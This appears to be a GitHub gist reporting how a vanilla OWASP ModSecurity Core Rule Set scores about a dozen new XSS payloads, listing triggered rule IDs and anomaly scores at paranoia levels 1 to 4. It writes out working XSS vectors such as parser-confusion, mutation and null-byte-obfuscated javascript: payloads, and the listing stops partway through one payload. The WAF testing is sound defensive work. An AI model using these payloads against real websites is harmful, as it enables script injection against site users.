Skip to content

Instantly share code, notes, and snippets.

@dune73
Last active September 26, 2019 22:10
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save dune73/b5012ed09b97063abf3e80fd4d30c9f3 to your computer and use it in GitHub Desktop.
Save dune73/b5012ed09b97063abf3e80fd4d30c9f3 to your computer and use it in GitHub Desktop.
Report of new XSS payloads being sent against a vanilla OWASP ModSecurity Core Rule Set installation
This is an attachment that goes with
https://coreruleset.org/20190926/running-a-few-dozens-of-new-magic-xss-payloads-against-crs-3-2/
Multiline payloads were submitted as separate payloads for simplicity.
We do not think this changes a thing. Single payloads would be easier to detect for CRS.
******* payload-002-001 ***********
Payload:
payload=<a href=# name=x id=x>Click me on IE11</a>
payload=<script event="onclick(blah)<wtfbbq>{}" for=x>blah.view.alert(1)</script>
payload=<script event=onload for=window>return alert(2)};{</script>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 43
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 59
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 72
******* payload-003-001 ***********
Payload:
payload=<noframes>
payload=<img alt=" </noframes><script>alert(1)</script> ">
payload=</noframes>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942100 PL1 SQL Injection Attack Detected via libinjection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
Total Incoming Score: 20
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942100 PL1 SQL Injection Attack Detected via libinjection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 38
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942100 PL1 SQL Injection Attack Detected via libinjection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 54
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942100 PL1 SQL Injection Attack Detected via libinjection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 67
******* payload-003-002 ***********
Payload:
payload=<template><select><option></template><img src=1 onerror=alert(1)></select></template>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 28
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 44
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 57
******* payload-006-001 ***********
Payload:
payload=<svg>
payload=<image>
payload=<title>
payload=<img title="</title><script>alert(1)</script>">
payload=</title>
payload=</svg>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942100 PL1 SQL Injection Attack Detected via libinjection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
Total Incoming Score: 20
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942100 PL1 SQL Injection Attack Detected via libinjection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 38
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942100 PL1 SQL Injection Attack Detected via libinjection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 54
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942100 PL1 SQL Injection Attack Detected via libinjection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 67
******* payload-007-001 ***********
Payload:
payload=<svg>
payload=<img>
payload=<title>
payload=<img title="</title><script>alert(1)</script>">
payload=</title>
payload=</svg>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942100 PL1 SQL Injection Attack Detected via libinjection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
Total Incoming Score: 20
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942100 PL1 SQL Injection Attack Detected via libinjection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 38
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942100 PL1 SQL Injection Attack Detected via libinjection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 54
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942100 PL1 SQL Injection Attack Detected via libinjection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 67
******* payload-008-001 ***********
Payload:
payload=<title>&lt;img&gt;
--- Paranoia Level 1 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
Total Incoming Score: 5
--- Paranoia Level 2 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 10
--- Paranoia Level 3 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
Total Incoming Score: 20
--- Paranoia Level 4 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 43
******* payload-008-002 ***********
Payload:
payload=<x/><title>&lt;/title&gt;&lt;img src=1 onerror=alert(1)&gt;
--- Paranoia Level 1 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 20
--- Paranoia Level 3 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
Total Incoming Score: 30
--- Paranoia Level 4 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 71
******* payload-008-003 ***********
Payload:
payload=<x/><title>&amp;lt;/title&amp;gt;&amp;lt;img src=1 onerror=alert(1)&amp;gt;
--- Paranoia Level 1 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 20
--- Paranoia Level 3 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
Total Incoming Score: 30
--- Paranoia Level 4 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 83
******* payload-009-001 ***********
Payload:
payload=<img ="/src/onerror=alert(1)//"
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942100 PL1 SQL Injection Attack Detected via libinjection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 20
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942100 PL1 SQL Injection Attack Detected via libinjection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
941330 PL2 IE XSS Filters - Attack Detected.
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
Total Incoming Score: 53
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942100 PL1 SQL Injection Attack Detected via libinjection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
941330 PL2 IE XSS Filters - Attack Detected.
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 69
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942100 PL1 SQL Injection Attack Detected via libinjection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
941330 PL2 IE XSS Filters - Attack Detected.
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 82
******* payload-009-002 ***********
Payload:
payload=<!-- --!><img src=1 onerror=alert(1)> -->
--- Paranoia Level 1 ---
941180 PL1 Node-Validator Blacklist Keywords
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 20
--- Paranoia Level 2 ---
941180 PL1 Node-Validator Blacklist Keywords
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
Total Incoming Score: 38
--- Paranoia Level 3 ---
941180 PL1 Node-Validator Blacklist Keywords
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 54
--- Paranoia Level 4 ---
941180 PL1 Node-Validator Blacklist Keywords
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 67
******* payload-009-003 ***********
Payload:
payload=<!-[x00][x00][x00][x00][x00]- ><div title="--><img src=1 onerror=alert(1)>"></div>
--- Paranoia Level 1 ---
941180 PL1 Node-Validator Blacklist Keywords
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 20
--- Paranoia Level 2 ---
941180 PL1 Node-Validator Blacklist Keywords
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942210 PL2 Detects chained SQL injection attempts 1/2
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
942300 PL2 Detects MySQL comments, conditions and ch(a)r injections
941330 PL2 IE XSS Filters - Attack Detected.
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 63
--- Paranoia Level 3 ---
941180 PL1 Node-Validator Blacklist Keywords
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942210 PL2 Detects chained SQL injection attempts 1/2
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
942300 PL2 Detects MySQL comments, conditions and ch(a)r injections
941330 PL2 IE XSS Filters - Attack Detected.
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 79
--- Paranoia Level 4 ---
941180 PL1 Node-Validator Blacklist Keywords
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942210 PL2 Detects chained SQL injection attempts 1/2
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
942300 PL2 Detects MySQL comments, conditions and ch(a)r injections
941330 PL2 IE XSS Filters - Attack Detected.
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 92
******* payload-010-001 ***********
Payload:
payload=<a href="javascript&[0x00]#x6a;avascript:alert(1)">test</a>
--- Paranoia Level 1 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941100 PL1 XSS Attack Detected via libinjection
Total Incoming Score: 10
--- Paranoia Level 2 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942440 PL2 SQL Comment Sequence Detected.
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 40
--- Paranoia Level 3 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942440 PL2 SQL Comment Sequence Detected.
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 53
--- Paranoia Level 4 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941100 PL1 XSS Attack Detected via libinjection
